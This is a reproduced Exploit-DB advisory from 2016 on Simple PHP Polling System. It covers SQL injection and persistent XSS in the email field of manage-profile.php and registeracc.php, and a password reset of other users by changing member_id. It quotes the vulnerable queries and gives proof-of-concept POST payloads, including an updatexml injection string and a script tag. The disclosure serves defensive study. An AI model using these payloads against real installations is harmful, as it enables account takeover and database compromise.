header-logo
Suggest Exploit
vendor:
Simple PHP Polling System
by:
WICS
7,5
CVSS
HIGH
SQL insertion injection, Persistent Cross Site Scripting, Password Reset
89, 79, 522
CWE
Product Name: Simple PHP Polling System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Multiple Vulnerabilities in Simple PHP Polling System

Simple PHP Polling System helps organizations to make polls of different types of positions with a number of candidates under each position. This vulnerable package has 5869+ downloads till the date. Multiple vulnerabilities (SQL insertion injection, Persistent Cross Site Scripting, Password Reset) exist in the manage-profile.php and registeracc.php pages. In manage-profile.php, there is no filteration or validation for user supplied data, on parameter $_POST['email'], which can be used to inject post parameter email to perform SQL Injection attack. In registeracc.php, there is no filteration or validation for user supplied data, on parameter $_POST['email'], which can be used to inject post parameter email to perform SQL Injection attack. In manage-profile.php page, by changing the value of 'member_id' attacker can reset the user details in the database. In manage-profile.php page, by changing the value of 'first_name' attacker can inject malicious script in the database.

Mitigation:

Input validation should be done for user supplied data. Access to the database should be restricted. Proper authentication and authorization should be implemented.
Source

Exploit-DB raw data:

Exploit Title	: Multiple Vulnerabilities in Simple PHP Polling System.
Author			: WICS
Date 			: 05-Jan-2016
Software Link	: http://sourceforge.net/projects/pollingsystem/


# Overview : 
Simple PHP Polling System helps organizations to make polls of different types of positions with a number of candidates under each position.
This vulnerable package ha 5869+ downlaods till the date.
Multiple vulnerabilities ( SQL insertion injection, Persistent Cross Site Scripting, Password Reset. )

1. SQL injection : Sql injetion  exist in following pages : 
   --------------
a) manage-profile.php : In manage-profile.php there is no filteration or validation for user supplied data, on parameter  " $_POST['email'] 
line no.33 -> $myEmail = $_POST['email'];
...
...
...
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )  or die( mysql_error() );

an attacker can inject post parameter email to perform SQL Injecton attack.


b) registeracc.php : In registeracc.php there is no filteration or validation for user supplied data, on parameter  " $_POST['email'] 
line no.26 -> $myEmail = $_POST['email'];
...
...
...
line no 30 -> $sql = mysql_query( "INSERT INTO tbMembers(first_name, last_name, email, password) VALUES ('$myFirstName','$myLastName', '$myEmail', '$newpass')" )
        or die( mysql_error() );

an attacker can inject post parameter email to perform SQL Injecton attack.

# PoC : firstname=WICS&lastname=tester&email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or'&password=password&ConfirmPassword=password&submit=Register+Account

2. Password reset : 
   ---------------
In manage-profile.php page, 
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )

By changing the value of 'member_id' attacker can reset the user details including his password.
steps to reproduce :
1. Login into your account.
2. Navagate to Manage My Profile.

Request will be something like - http://localhost/vote/manage-profile.php?id= somenumber
here the value of id will be id of victim, and value of rest of the post parameter will set by attacker.
# PoC :  firstname=Attacker&lastname=LastNmae&email=Tester%40wics.com&password=adminadmin&ConfirmPassword=adminadmin&update=Update+Profile


3. Persistent Cross site Scripting : In 'registeracc.php' and 'manage-profile.php' page the value of post parameter ' email ' supplied by user is not being     -----------------------------------  validated .this leaves application vulnerable to persistent Cross Site Scripting. 

# PoC :   firstname=WICS&lastname=wics&email=<script>alert(document.location)</script>&password=admin&ConfirmPassword=admin&update=Update+Profile

Navigation

Suggest Exploit

Services By CQR